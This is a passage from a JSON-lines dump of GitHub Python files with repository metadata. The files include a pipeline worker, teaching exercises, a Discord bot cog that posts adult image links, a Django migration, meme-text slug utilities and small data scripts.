pipeline.stages:\n stage_run_status = StageRunStatus(name=stage.name)\n stage_context = StageContext(pipeline_context, stage, stage_run_status)\n stage_run_status.name = stage.name\n run_stage(stage_context, stage_run_status)\n pipeline_status.stages.append(stage_context.stageStatus)\n\n elapsed_time = time.time() - start\n pipeline_status.completeTime = elapsed_time\n pipeline_status.status = FINISHED\n log.info(\"run pipeline \\\"{0}\\\" spend time \\\"{1}\\\" \".format(pipeline.name, elapsed_time))\n if pipeline_topic.kind is None or pipeline_topic.kind != pipeline_constants.SYSTEM:\n __trigger_all_pipeline(pipeline_context.pipeline_trigger_merge_list, pipeline_context.currentUser,\n pipeline_context.traceId)\n except Exception as e:\n trace = traceback.format_exc()\n log.error(trace)\n pipeline_status.error = trace\n pipeline_status.status = ERROR\n finally:\n if settings.PIPELINE_MONITOR_ON:\n if pipeline_topic.kind is not None and pipeline_topic.kind == pipeline_constants.SYSTEM:\n log.debug(\"pipeline_status is {0}\".format(pipeline_status))\n else:\n asyncio.ensure_future(sync_pipeline_monitor_log(pipeline_status))\n else:\n log.info(\"pipeline {0} status is {1}\".format(pipeline.name, pipeline_status.status))\n","repo_name":"Indexical-Metrics-Measure-Advisory/watchmen-matryoshka-doll","sub_path":"watchmen/pipeline/core/worker/pipeline_worker.py","file_name":"pipeline_worker.py","file_ext":"py","file_size_in_byte":6956,"program_lang":"python","lang":"en","doc_type":"code","stars":130,"dataset":"github-code","pt":"92"}
+{"seq_id":"74787056299","text":"#driver.py\r\nfrom student import Student\r\n\r\ndef main():\r\n #With what we know...\r\n '''\r\n name = 'John'\r\n kuid = 12345\r\n gpa = 3.0\r\n major = 'EECS'\r\n '''\r\n\r\n #Creating new Student\r\n stu1 = Student('John', 12345)\r\n stu2 = Student('Mandy', 54321)\r\n \r\n #Give the attributes values\r\n #stu1.name = 'John'\r\n #stu1.kuid = 12345\r\n stu1.gpa = 3.0\r\n stu1.major = 'EECS'\r\n\r\n #stu2.name = 'Mandy'\r\n #stu2.kuid = 54321\r\n stu2.gpa = 4.0\r\n stu2.major = 'MATH'\r\n\r\n print(stu1.name, ' ' , stu1.gpa)\r\n print(stu2.name, ' ' , stu2.gpa)\r\n\r\n #Notice there's only 1 parameter?\r\n stu1.change_major('COOK')\r\n stu2.change_major('ECON')\r\n\r\n\r\nmain()\r\n \r\n","repo_name":"jwgibbo/public_html","sub_path":"eecs168/2021fall/TR/2021.11.09/driver.py","file_name":"driver.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"92"}
+{"seq_id":"25158082292","text":"n = int(input())\nwokabl = set()\nfor ind in range(n):\n wokabl.add(input().lower())\n\nn = int(input())\noutset = set()\nfor ind in range(n):\n words = [str(word) for word in input().split()]\n for word in words:\n if word.lower() not in wokabl:\n if word.lower() not in outset:\n print(word) \n outset.add(word.lower())","repo_name":"Solovova/lessons","sub_path":"course/cource373.py","file_name":"cource373.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"}
+{"seq_id":"197451244","text":"'''\n[Instance Methods]\nThe first method on MyClass, called method, is a regular instance method. That’s the basic, no-frills method type you’ll use most of the time. \nThe method takes at least one parameter, self, which points to an instance of MyClass when the method is called (but of course instance methods can accept more than just one parameter).\nThrough the self parameter, instance methods can freely access attributes and other methods on the same object. This gives them a lot of power when it comes to modifying an object’s state.\nNot only can they modify object state, instance methods can also access the class itself through the self.__class__ attribute. This means instance methods can also modify class state.\n\n[Class Methods]\nLet’s compare that to the second method, MyClass.classmethod. I marked this method with a @classmethod decorator to flag it as a class method.\nInstead of accepting a self parameter, class methods take a cls parameter that points to the class—and not the object instance—when the method is called.\nBecause the class method only has access to this cls argument, it can’t modify object instance state. That would require access to self. \nHowever, class methods can still modify class state that applies across all instances of the class.\n\n[Static Methods]\nThe third method, MyClass.staticmethod was marked with a @staticmethod decorator to flag it as a static method.\nThis type of method takes neither a self nor a cls parameter (but of course it’s free to accept an arbitrary number of other parameters).\nTherefore a static method can neither modify object state nor class state. Static methods are restricted in what data they can access - and they’re primarily a way to namespace your methods.\n\n'''\n\nclass A(object):\n    data = \"A's initial value\"\n\n    def __init__(self, value=None):\n        if value:\n            self.data = value  # assign to the instance, not a throwaway local\n\n    def method(self):\n        return \"instance method called\", self\n\n    def method2(self):\n        print(self.data)\n\n    @classmethod\n    def classmethod(cls):\n        print(cls.data)\n        return \"class method called\", cls\n\n    @staticmethod\n    def staticmethod():\n        return \"static method called\"\n\n\n\nclass AA(A):\n    data = \"AA's initial value\"\n    data2 = \"AA's special data\"\n\n    def __init__(self, value=None, value2=None):\n        if value:\n            self.data = value\n        if value2:\n            self.data2 = value2\n\n\n\ndef test():\n    a = A()\n    aa = AA(\"new value\")\n\n    print(a.method)\n    print(a.classmethod)\n    print(A.classmethod)\n    print(A.staticmethod)\n\n    print(AA.classmethod)\n    print(A.classmethod)\n    print(a.classmethod)\n\n    \n\n\nif __name__ == \"__main__\":\n    test()","repo_name":"icoding2016/study","sub_path":"PY/basic/method_types.py","file_name":"method_types.py","file_ext":"py","file_size_in_byte":2691,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"92"}
+{"seq_id":"21308350488","text":"import discord\nfrom discord.ext import commands\nfrom .utils.dataIO import fileIO\nfrom cogs.utils.dataIO import dataIO\nfrom datetime import datetime\nfrom copy import deepcopy\nfrom .utils import checks\nfrom __main__ import send_cmd_help\n# Sys\nimport aiohttp\nimport random\nimport os\nimport sys\nimport requests\n\nDIR_DATA = \"data/oboobs\"\nSETTINGS = DIR_DATA + \"/settings.json\"\n\n\n# API info:\n# example: \"/boobs/10/20/rank/\" - get 20 boobs elements, start from 10th ordered by rank; noise: \"/noise/{count=1; sql limit}/\",\n# example: \"/noise/50/\" - get 50 random noise elements; model search: \"/boobs/model/{model; sql ilike}/\",\n# example: \"/boobs/model/something/\" - get all boobs elements, where model name contains \"something\", ordered by id; author search: \"/boobs/author/{author; sql ilike}/\",\n# example: \"/boobs/author/something/\" - get all boobs elements, where author name contains \"something\", ordered by id; get boobs by id: \"/boobs/get/{id=0}/\",\n# example: \"/boobs/get/6202/\" - get boobs element with id 6202; get boobs count: \"/boobs/count/\"; get noise count: \"/noise/count/\"; vote for boobs: \"/boobs/vote/{id=0}/{operation=plus;[plus,minus]}/\",\n# example: \"/boobs/vote/6202/minus/\" - negative vote for boobs with id 6202; vote for noise: \"/noise/vote/{id=0}/{operation=plus;[plus,minus]}/\",\n# example: \"/noise/vote/57/minus/\" - negative vote for noise with id 57;\n\n# example: \"/butts/10/20/rank/\" - get 20 butts elements, start from 10th ordered by rank; noise: \"/noise/{count=1; sql limit}/\",\n# example: \"/noise/50/\" - get 50 random noise elements; model search: \"/butts/model/{model; sql ilike}/\",\n# example: \"/butts/model/something/\" - get all butts elements, where model name contains \"something\", ordered by id; author search: \"/butts/author/{author; sql ilike}/\",\n# example: \"/butts/author/something/\" - get all butts elements, where author name contains \"something\", ordered by id; get butts by id: \"/butts/get/{id=0}/\",\n# example: \"/butts/get/6202/\" - get butts element with id 6202; get butts count: \"/butts/count/\"; get noise count: \"/noise/count/\"; vote for butts: \"/butts/vote/{id=0}/{operation=plus;[plus,minus]}/\",\n# example: \"/butts/vote/6202/minus/\" - negative vote for butts with id 6202; vote for noise: \"/noise/vote/{id=0}/{operation=plus;[plus,minus]}/\",\n# example: \"/noise/vote/57/minus/\" - negative vote for noise with id 57;\n\nclass BankError(Exception):\n pass\n\n\nclass AccountAlreadyExists(BankError):\n pass\n\n\nclass NoAccount(BankError):\n pass\n\n\nclass Statistique:\n def __init__(self, bot, file_path):\n self.accounts = dataIO.load_json(file_path)\n self.bot = bot\n\n def create_account(self, user):\n server = user.server\n if not self.account_exists(user):\n if server.id not in self.accounts:\n self.accounts[server.id] = {}\n if user.id in self.accounts: # Legacy account <-fort risque de bug\n Sboobs = self.accounts[user.id][\"boobs\"]\n Sass = self.accounts[user.id][\"ass\"]\n Shentai = self.accounts[user.id][\"hentai\"]\n else:\n Sboobs, Sass, Shentai = 0, 0, 0\n timestamp = datetime.utcnow().strftime(\"%Y-%m-%d %H:%M:%S\")\n account = {\"name\": user.name,\n \"boobs\": Sboobs,\n \"ass\": Sass,\n \"hentai\": Shentai,\n \"created_at\": timestamp\n }\n self.accounts[server.id][user.id] = account\n self._save_bank()\n # return self.get_account(user)\n else:\n raise AccountAlreadyExists()\n\n def account_exists(self, user):\n try:\n self._get_account(user)\n 
except NoAccount:\n return False\n return True\n\n def _get_account(self, user):\n server = user.server\n try:\n return deepcopy(self.accounts[server.id][user.id])\n except KeyError:\n raise NoAccount()\n\n def _save_bank(self):\n dataIO.save_json(\"data/oboobs/statistique.json\", self.accounts)\n\n def get_oboobs_tot(self, user):\n account = self._get_account(user)\n return account[\"boobs\"] + account[\"ass\"] + account[\"hentai\"]\n\n def get_oboobs(self, user, Stype): # Stype=boobs|ass|hentai\n account = self._get_account(user)\n return account[Stype]\n\n def get_max_oboobs(self, user):\n server = user.server\n try:\n max = 0\n theuser = None\n for other in self.accounts[server.id]:\n account = self.accounts[server.id][other]\n k = account[\"boobs\"] + account[\"ass\"] + account[\"hentai\"]\n if k > max:\n max = k\n theuser = other\n if k == 0:\n raise NoAccount()\n return self.accounts[server.id][theuser][\"name\"]\n except:\n raise NoAccount()\n\n def up_oboobs(self, user, Stype): # Stype=boobs|ass|hentai\n server = user.server\n if not self.account_exists(user):\n self.create_account(user)\n account = self._get_account(user)\n account[Stype] = account[Stype] + 1\n self.accounts[server.id][user.id] = account\n self._save_bank()\n\n def wipe_stat(self, server):\n self.accounts[server.id] = {}\n self._save_bank()\n\n def wipe_stat_perso(self, user):\n server = user.server\n if self.account_exists(user):\n temp_server_accounts = {}\n raw_server_accounts = deepcopy(self.accounts[server.id])\n for k in self.accounts[server.id]:\n if k != user.id:\n temp_server_accounts[k] = self.accounts[server.id][k]\n self.accounts[server.id] = temp_server_accounts\n self._save_bank()\n\n\nclass oboobs:\n \"\"\"The oboobs/obutts.ru NSFW pictures of nature cog.\n https://github.com/Canule/Mash-Cogs\n \"\"\"\n\n def __init__(self, bot):\n self.bot = bot\n\n self.stat_class = Statistique(bot, \"data/oboobs/statistique.json\")\n self.settings = fileIO(SETTINGS, \"load\")\n\n @commands.group(name=\"oboobs\", pass_context=True)\n async def _oboobs(self, ctx):\n \"\"\"The oboobs/obutts.ru pictures of nature cog.\"\"\"\n if ctx.invoked_subcommand is None:\n await send_cmd_help(ctx)\n return\n\n # Boobs\n @commands.command(pass_context=True, no_pm=False)\n async def boobs(self, ctx, *nb):\n \"\"\"Shows some boobs.\"\"\"\n author = ctx.message.author\n nsfwChan = False\n\n try:\n if nb == ():\n nb = 1\n else:\n nb = int(nb[0])\n nb = min(nb, 5)\n except Exception as e:\n nb = 1\n for a in self.settings[\"nsfw_channels\"]:\n if a == ctx.message.channel.id:\n nsfwChan = True\n break\n try:\n if nsfwChan:\n if self.settings[\"nsfw_msg\"]:\n await self.bot.say(\"{}` Pas de ça ici cochon`\".format(author.mention))\n await self.bot.say(\"https://media.giphy.com/media/WUeeGwT8d8KFa/giphy.gif\")\n else:\n for k in range(nb):\n rdm = random.randint(0, 10219)\n search = (\"http://api.oboobs.ru/boobs/{}\".format(rdm))\n async with aiohttp.get(search) as r:\n result = await r.json()\n boob = random.choice(result)\n boob = \"http://media.oboobs.ru/{}\".format(boob[\"preview\"])\n await self.bot.say(\"{}\".format(boob))\n if not ctx.message.channel.is_private:\n self.stat_class.up_oboobs(author, \"boobs\")\n except Exception as e:\n await self.bot.say(\"{} ` Error getting results.`\".format(author.mention))\n return\n\n # Hentai\n @commands.command(pass_context=True, no_pm=False)\n async def hentai(self, ctx, *tag):\n \"\"\"Shows some hentai.\"\"\"\n author = ctx.message.author\n nsfwChan = False\n for a in 
self.settings[\"nsfw_channels\"]:\n if a == ctx.message.channel.id:\n nsfwChan = True\n break\n nmax = 100\n try:\n if tag == ():\n tag = 'nude'\n else:\n tag = tag[0]\n search = \"https://danbooru.donmai.us/posts.xml?limit=\" + str(nmax) + \"&tags=\" + tag\n r = requests.get(search)\n hentai = r.text\n size = len(\"\")\n total = hentai.count(\"\")\n if total == 0:\n await self.bot.say(\"pas de ça en stock\")\n return\n rdm = random.randint(0, min(nmax, total) - 1)\n a, b = 0, 0\n for k in range(rdm + 1):\n a = hentai.index(\"\", a + size)\n b = hentai.index(\"\", b + size)\n hentai = hentai[a + size:b]\n except Exception as e:\n await self.bot.say(\"{} ` Error getting results.`\".format(author.mention))\n return\n if not nsfwChan:\n await self.bot.say(\"{}\".format(hentai))\n if not ctx.message.channel.is_private:\n self.stat_class.up_oboobs(author, \"hentai\")\n else:\n await self.bot.send_message(ctx.message.author, \"{}\".format(hentai))\n if self.settings[\"nsfw_msg\"]:\n await self.bot.say(\"{}` Pas de ça ici cochon`\".format(author.mention))\n await self.bot.say(\"http://giphy.com/gifs/mrw-hentai-rV8O58C2QWf4s\")\n\n # Cat\n @commands.command(pass_context=True, no_pm=False)\n async def cat(self, ctx):\n \"\"\"Shows some cats.\"\"\"\n author = ctx.message.author\n search = (\"http://thecatapi.com/api/images/get\")\n try:\n async with aiohttp.get(search) as r:\n cat = r.url\n await self.bot.say(cat)\n except Exception as e:\n await self.bot.say(\"{} ` Error getting results.`\".format(author.mention))\n return\n\n # Ass\n @commands.command(pass_context=True, no_pm=False)\n async def ass(self, ctx, *nb):\n \"\"\"Shows some ass.\"\"\"\n author = ctx.message.author\n nsfwChan = False\n try:\n if nb == ():\n nb = 1\n else:\n nb = int(nb[0])\n nb = min(nb, 5)\n except Exception as e:\n nb = 1\n for a in self.settings[\"nsfw_channels\"]:\n if a == ctx.message.channel.id:\n nsfwChan = True\n break\n try:\n if nsfwChan:\n if self.settings[\"nsfw_msg\"]:\n await self.bot.say(\"{}` Pas de ça ici cochon`\".format(author.mention))\n await self.bot.say(\"https://media.giphy.com/media/qIFepMd1Dx0uQ/giphy.gif\")\n else:\n for k in range(nb):\n rdm = random.randint(0, 4155)\n search = (\"http://api.obutts.ru/butts/{}\".format(rdm))\n async with aiohttp.get(search) as r:\n result = await r.json()\n ass = random.choice(result)\n ass = \"http://media.obutts.ru/{}\".format(ass[\"preview\"])\n await self.bot.say(\"{}\".format(ass))\n if not ctx.message.channel.is_private:\n self.stat_class.up_oboobs(author, \"ass\")\n except Exception as e:\n await self.bot.say(\"{} ` Error getting results.`\".format(author.mention))\n return\n\n # stat\n @commands.command(pass_context=True, no_pm=False)\n async def stat(self, ctx, user: discord.Member, *tag):\n \"\"\"Show some stats.\"\"\"\n author = ctx.message.author\n try:\n if self.stat_class.account_exists(user):\n if len(tag) != 0 and (tag[0] in [\"boobs\", \"ass\", \"hentai\"]):\n await self.bot.say(\n \"{} a utilisé {} {} fois\".format(user.name, tag[0], self.stat_class.get_oboobs(user, tag[0])))\n else:\n await self.bot.say(\n \"{} a affiché {} truc cochons au total\".format(user.name, self.stat_class.get_oboobs_tot(user)))\n else:\n await self.bot.say(\"{} est encore vierge de ce Discord\".format(user.name))\n except Exception as e:\n await self.bot.say(\"erreur :{}\".format(e))\n\n # stats\n @commands.command(pass_context=True, no_pm=False)\n async def stats(self, ctx):\n \"\"\"Show the Pervert Master.\"\"\"\n author = ctx.message.author\n try:\n sortie = 
self.stat_class.get_max_oboobs(author)\n await self.bot.say(\"{} est le plus grand pervers de ce Discord\".format(sortie))\n except NoAccount:\n await self.bot.say(\"Toutes les âmes ici-bas sont pûres\")\n\n # reset\n @checks.admin_or_permissions(manage_server=True)\n @_oboobs.command(pass_context=True, no_pm=False)\n async def reStat(self, ctx, user: discord.Member):\n \"\"\"Navifation InPrivate\"\"\"\n author = ctx.message.author\n try:\n self.stat_class.wipe_stat_perso(user)\n except Exception as e:\n await self.bot.say(e)\n await self.bot.say(\"Et un puceau de plus dans ce Discord\")\n\n @checks.admin_or_permissions(manage_server=True)\n @_oboobs.command(pass_context=True, no_pm=False)\n async def nsfw(self, ctx):\n \"\"\"Toggle oboobs nswf for this channel on/off.\n Admin/owner restricted.\"\"\"\n user = ctx.message.author\n nsfwChan = None\n # Reset nsfw.\n for a in self.settings[\"nsfw_channels\"]:\n if a == ctx.message.channel.id:\n nsfwChan = True\n self.settings[\"nsfw_channels\"].remove(a)\n await self.bot.say(\"{} ` nsfw ON`\".format(user.mention))\n break\n # Set nsfw.\n if not nsfwChan:\n if ctx.message.channel not in self.settings[\"nsfw_channels\"]:\n self.settings[\"nsfw_channels\"].append(ctx.message.channel.id)\n await self.bot.say(\"{} ` nsfw OFF`\".format(user.mention))\n fileIO(SETTINGS, \"save\", self.settings)\n\n @checks.admin_or_permissions(manage_server=True)\n @_oboobs.command(pass_context=True, no_pm=False)\n async def togglemsg(self, ctx):\n \"\"\"Enable/Disable the oboobs nswf not allowed message\n Admin/owner restricted.\"\"\"\n user = ctx.message.author\n # Toggle\n if self.settings[\"nsfw_msg\"]:\n self.settings[\"nsfw_msg\"] = False\n await self.bot.say(\"{} ` DM nsfw channel msg is now: Disabled.`\".format(user.mention))\n elif not self.settings[\"nsfw_msg\"]:\n self.settings[\"nsfw_msg\"] = True\n await self.bot.say(\"{} ` DM nsfw channel msg is now: Enabled.`\".format(user.mention))\n fileIO(SETTINGS, \"save\", self.settings)\n\n\ndef check_folders():\n if not os.path.exists(DIR_DATA):\n print(\"Creating data/oboobs folder...\")\n os.makedirs(DIR_DATA)\n\n\ndef check_files():\n settings = {\"nsfw_channels\": [\"133251234164375552\"],\n \"nsfw_msg\": True} # Red's testing chan. nsfw content off by default.\n\n if not fileIO(SETTINGS, \"check\"):\n print(\"Creating settings.json\")\n fileIO(SETTINGS, \"save\", settings)\n\n f = \"data/oboobs/statistique.json\"\n if not dataIO.is_valid_json(f):\n print(\"Creating empty bank.json...\")\n dataIO.save_json(f, {})\n\n\ndef setup(bot):\n check_folders()\n check_files()\n bot.add_cog(oboobs(bot))\n","repo_name":"inpprenable/RustyBot","sub_path":"oboobs/oboobs.py","file_name":"oboobs.py","file_ext":"py","file_size_in_byte":15751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
+{"seq_id":"35825869014","text":"# Variables\nno_of_neighbors = 4\nrand_neighbors = 0\nno_of_nodes = 50\nno_of_steps = 4\n\n# parameters\nedge_strength_chance = .33333\nlow_edge_strength = 0\nhigh_edge_strength = 1\nK = 0.01\n\n#colors\nnode_color = '#007959'\nedge_color = '#000000'\n\n#networks\n# network_type = 'watts_strogatz'\nnetwork_type = 'barabasi_albert'\n\n\nsimilarity_treshold = .1\n# run_count = 0","repo_name":"BenDickens/Brandwonden-Project-IAS","sub_path":"Example Mesa/Code/globals.py","file_name":"globals.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
+{"seq_id":"13066932935","text":"#!/usr/bin/env python3.6\nimport argparse\n\n\ndef main(args):\n  a, b = 0, 1\n  for _ in range(args.n):\n    a, b = b, a+b\n\n  print(a)\n\n\nif __name__ == '__main__':\n  parser = argparse.ArgumentParser()\n  parser.add_argument('-n', type=int, required=True)\n\n  args = parser.parse_args()\n  main(args)\n","repo_name":"davidb2/rosalind","sub_path":"src/python/fibo.py","file_name":"fibo.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
+{"seq_id":"16494399293","text":"import bpy\r\nfrom bpy.props import *\r\nfrom . mix_data import getMixCode\r\nfrom ... base_types import AnimationNode\r\nfrom ... events import executionCodeChanged\r\n\r\nclass AnimateDataNode(bpy.types.Node, AnimationNode):\r\n bl_idname = \"an_AnimateDataNode\"\r\n bl_label = \"Animate Data\"\r\n bl_width_default = 150\r\n dynamicLabelType = \"ALWAYS\"\r\n\r\n onlySearchTags = True\r\n searchTags = [ (\"Animate Matrix\", {\"dataType\" : repr(\"Matrix\")}),\r\n (\"Animate Vector\", {\"dataType\" : repr(\"Vector\")}),\r\n (\"Animate Float\", {\"dataType\" : repr(\"Float\")}),\r\n (\"Animate Color\", {\"dataType\" : repr(\"Color\")}),\r\n (\"Animate Euler\", {\"dataType\" : repr(\"Euler\")}),\r\n (\"Animate Quaternion\", {\"dataType\" : repr(\"Quaternion\")}) ]\r\n\r\n dataType = StringProperty(default = \"Float\", update = AnimationNode.refresh)\r\n\r\n def create(self):\r\n self.newInput(\"Float\", \"Time\", \"time\")\r\n self.newInput(self.dataType, \"Start\", \"start\")\r\n self.newInput(self.dataType, \"End\", \"end\")\r\n self.newInput(\"Interpolation\", \"Interpolation\", \"interpolation\", defaultDrawType = \"PROPERTY_ONLY\")\r\n self.newInput(\"Float\", \"Duration\", \"duration\", value = 20, minValue = 0.001)\r\n\r\n self.newOutput(\"Float\", \"Time\", \"outTime\")\r\n self.newOutput(self.dataType, \"Result\", \"result\")\r\n\r\n def drawLabel(self):\r\n return \"Animate \" + self.inputs[1].dataType\r\n\r\n def getExecutionCode(self):\r\n yield \"finalDuration = max(duration, 0.0001)\"\r\n yield \"influence = max(min(time / finalDuration, 1.0), 0.0)\"\r\n yield \"influence = interpolation(influence)\"\r\n yield getMixCode(self.dataType, \"start\", \"end\", \"influence\", \"result\")\r\n yield \"outTime = time - finalDuration\"\r\n","repo_name":"TREYWANGCQU/Blender_Reaticle","sub_path":"release/scripts/addons/animation_nodes/nodes/generic/animate_data.py","file_name":"animate_data.py","file_ext":"py","file_size_in_byte":1800,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"92"}
+{"seq_id":"28543145934","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('vms', '0002_ipaddress_vms'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='backup',\n name='manifest_path',\n field=models.CharField(max_length=255, verbose_name='Manifest path', blank=True),\n ),\n ]\n","repo_name":"erigones/esdc-ce","sub_path":"vms/migrations/0003_backup_manifest_path.py","file_name":"0003_backup_manifest_path.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","stars":112,"dataset":"github-code","pt":"92"}
+{"seq_id":"35867216913","text":"import hashlib\nimport re\nfrom urllib.parse import unquote\n\n\ndef encode(lines: list[str]) -> str:\n encoded_lines = []\n\n for line in lines:\n if line == \"/\":\n encoded_lines.append(\"_\")\n elif line:\n encoded_lines.append(_encode(line))\n else:\n encoded_lines.append(\"_\")\n\n slug = \"/\".join(encoded_lines)\n\n return slug or \"_\"\n\n\ndef _encode(line):\n has_trailing_under = \"_ \" in line\n\n encoded = unquote(line)\n\n for before, after in [\n (\"_\", \"__\"),\n (\"-\", \"--\"),\n (\" \", \"_\"),\n (\"?\", \"~q\"),\n (\"%\", \"~p\"),\n (\"#\", \"~h\"),\n ('\"', \"''\"),\n (\"/\", \"~s\"),\n (\"\\\\\", \"~b\"),\n (\"\\n\", \"~n\"),\n (\"&\", \"~a\"),\n (\"<\", \"~l\"),\n (\">\", \"~g\"),\n (\"‘\", \"'\"),\n (\"’\", \"'\"),\n (\"“\", '\"'),\n (\"”\", '\"'),\n (\"–\", \"-\"),\n ]:\n encoded = encoded.replace(before, after)\n\n if has_trailing_under:\n encoded = encoded.replace(\"___\", \"__-\")\n\n return encoded\n\n\ndef decode(slug: str) -> list[str]:\n has_dash = \"_----\" in slug\n has_flag = \"_--\" in slug\n has_arrow = \"_--~g\" in slug\n has_under = \"___\" in slug\n\n slug = slug.replace(\"_\", \" \").replace(\" \", \"_\")\n slug = slug.replace(\"-\", \" \").replace(\" \", \"-\")\n slug = slug.replace(\"''\", '\"')\n\n if has_dash:\n slug = slug.replace(\"-- \", \" --\")\n elif has_flag:\n slug = slug.replace(\"- \", \" -\")\n\n if has_arrow:\n slug = slug.replace(\"- ~g\", \" -~g\")\n\n if has_under:\n slug = slug.replace(\"_ \", \" _\")\n\n for before, after in [\n (\"~q\", \"?\"),\n (\"~p\", \"%\"),\n (\"~h\", \"#\"),\n (\"~n\", \"\\n\"),\n (\"~a\", \"&\"),\n (\"~l\", \"<\"),\n (\"~g\", \">\"),\n (\"~b\", \"\\\\\"),\n ]:\n slug = slug.replace(before, after)\n\n lines = slug.split(\"/\")\n lines = [line.replace(\"~s\", \"/\") for line in lines]\n\n return lines\n\n\ndef normalize(slug: str) -> tuple[str, bool]:\n slug = unquote(slug)\n normalized_slug = encode(decode(slug))\n return normalized_slug, slug != normalized_slug\n\n\ndef fingerprint(value: str, *, prefix=\"_custom-\", suffix=\"\") -> str:\n return prefix + hashlib.sha1(value.encode()).hexdigest() + suffix\n\n\ndef slugify(value: str) -> str:\n return re.sub(r\"[^a-z0-9-]\", \"\", value).strip(\"-\")\n","repo_name":"jacebrowning/memegen","sub_path":"app/utils/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":2329,"program_lang":"python","lang":"en","doc_type":"code","stars":1161,"dataset":"github-code","pt":"92"}
+{"seq_id":"7528553891","text":"from application.views.model_utils import VideoModel\nfrom application.views.utils.config_utils import config\nimport time\nimport numpy as np\n\n\n\nmodel = VideoModel(config.thumos19)\nmodel.prop_model.load_prerun_result()\nmodel.cluster_helper.call_test()\n\n\nexit(0)\ntime1 = time.time()\n\nclass_label = 0\naction_id = \"686-10\"\nn_neighbors = 5\n\naction_ids = model.cluster_helper.get_actions(class_label)\nprint(action_ids[0])\nprint(len(action_ids))\n\ndist = model.cluster_helper.get_alignment_of_anchor_action(class_label, action_id, n_neighbors)\ndist = np.array(dist)\n\nfrom itertools import permutations\n# both p1 and p2 should be a permutation of 0-n sequence.\ndef count_reverse_pair(p, q, d = None):\n n = len(p)\n cnt = 0\n for i in range(n):\n for j in range(i + 1, n):\n if (p[i] < p[j]) != (q[i] < q[j]):\n if d is None:\n cnt += 1\n else:\n cnt += abs(d[i] - d[j])\n return cnt\n\n# alpha is a parameter to balance the between cost and self cost.\ndef get_order_by_dist_matrix(input_dist, alpha = 1.0):\n input_dist = np.array(input_dist)\n n_cols = input_dist.shape[1]\n n_rows = input_dist.shape[0]\n order = [i for i in range(n_rows)]\n all_states = [x for x in permutations(order)]\n col_states = []\n for i in range(n_cols):\n col_states.append(tuple(np.argsort(input_dist[:, i]).tolist()))\n min_value = input_dist[:, i].min()\n max_value = input_dist[:, i].max()\n input_dist[:, i] = (input_dist[:, i] - min_value) / (max_value - min_value) * (n_rows - 1)\n print(col_states)\n dist = {}\n prev = {}\n\n Q = []\n head = 0\n start = (0, col_states[0])\n dist[start] = 0\n prev[start] = None\n Q.append(start)\n\n min_dist = 1e10\n end_state = None\n while head < len(Q):\n curr_state = Q[head]\n col, state1 = curr_state\n head += 1\n d = dist[curr_state]\n if d > min_dist:\n continue\n for state2 in all_states:\n between_cost = count_reverse_pair(state1, state2)\n self_cost = count_reverse_pair(state2, col_states[col + 1], input_dist[:, col + 1])\n cost = between_cost * between_cost + self_cost * self_cost * alpha\n next_state = (col + 1, state2)\n if col + 1 == n_cols - 1:\n if d + cost < min_dist:\n min_dist = d + cost\n prev[next_state] = curr_state\n end_state = next_state\n else:\n if next_state not in dist:\n dist[next_state] = d + cost\n prev[next_state] = curr_state\n Q.append(next_state)\n elif d + cost < dist[next_state]:\n dist[next_state] = d + cost\n prev[next_state] = curr_state\n state = end_state\n ret = []\n while state != None:\n ret.append(state[1])\n state = prev[state]\n ret = ret[::-1]\n return ret\n\nprint(get_order_by_dist_matrix(dist))\n\ntime2 = time.time()\nprint(\"Using time {} s\".format(time2 - time1))\n\n","repo_name":"thu-vis/ActLocalizer","sub_path":"call.py","file_name":"call.py","file_ext":"py","file_size_in_byte":3106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
+{"seq_id":"11618386816","text":"'''Exercício Python 054: Crie um programa que leia o ano de nascimento de sete pessoas.\n No final, mostre quantas pessoas ainda não atingiram a maioridade e quantas já são maiores.\n'''\n\nfrom datetime import date\n\nano = date.today().year\nmaior = 21\nmaiores = 0\nmenores = 0\nprint('Quais anos de nascimento: ')\nfor c in range(1,8):\n    nascimento = int(input('{}º Ano: '.format(c)))\n    if ano - nascimento >= maior:\n        maiores = maiores + 1\n    else:\n        menores = menores + 1\nprint('{} pessoas ainda não atingiram a maioridade e {} já são maiores'.format(menores, maiores))\n","repo_name":"Dawisonms/Python","sub_path":"Curso em video/Exercicios/Modulo 2/Ex054.py","file_name":"Ex054.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"90"}
+{"seq_id":"35065919847","text":"\"\"\"\nReading file\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\n\ngun_data = pd.read_csv('full_data.csv', index_col='Unnamed: 0')\n\n# Changing categories to numbers\n\n#1. Mapping each education category to a numeric code\n\neducation_replace = {\n    'Less than HS': 1,\n    'HS/GED': 2,\n    'Some college': 3,\n    'BA+': 4,\n    np.NaN: 5 # Pandas helpfully (unhelpfully) assumes NaN, NA and other variations to be np.NaN type.\n    #'NA' is taken as NaN unhelpfully in this case.\n}\n\n#2. Replacing education categories with their numeric codes\ngun_data['education'] = gun_data['education'].map(education_replace)\nprint(gun_data['education'].value_counts())\n","repo_name":"jin-park-dev/Data_Analyst_Gun_Death","sub_path":"a_02_gun_death_us/a_02_cleaning.py","file_name":"a_02_cleaning.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"}
